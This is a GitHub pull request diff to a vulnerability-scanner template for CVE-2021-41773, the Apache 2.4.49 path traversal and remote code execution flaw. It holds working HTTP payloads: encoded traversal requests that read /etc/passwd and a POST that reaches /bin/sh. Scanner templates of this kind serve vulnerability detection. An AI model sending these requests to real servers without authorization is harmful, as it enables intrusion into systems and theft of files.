Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update CVE-2021-41773.yaml #6192

Merged
merged 2 commits into from
Dec 16, 2022
Merged

Update CVE-2021-41773.yaml #6192

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
5978dc7
Update CVE-2021-41773.yaml
y0no Nov 30, 2022
f147770
Update CVE-2021-41773.yaml
ritikchaddha Dec 16, 2022
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 7 additions & 4 deletions cves/2021/CVE-2021-41773.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,23 +4,23 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo,666asd
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
remediation: Update to Apache HTTP Server 2.4.50 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: apache version:2.4.49
verified: "true"
shodan-query: Apache 2.4.49
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev

variables:
Expand All @@ -32,6 +32,10 @@ requests:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}

- |
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}

- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Expand All @@ -42,7 +46,6 @@ requests:
stop-at-first-match: true
matchers-condition: or
matchers:

- type: regex
name: LFI
regex:
Expand Down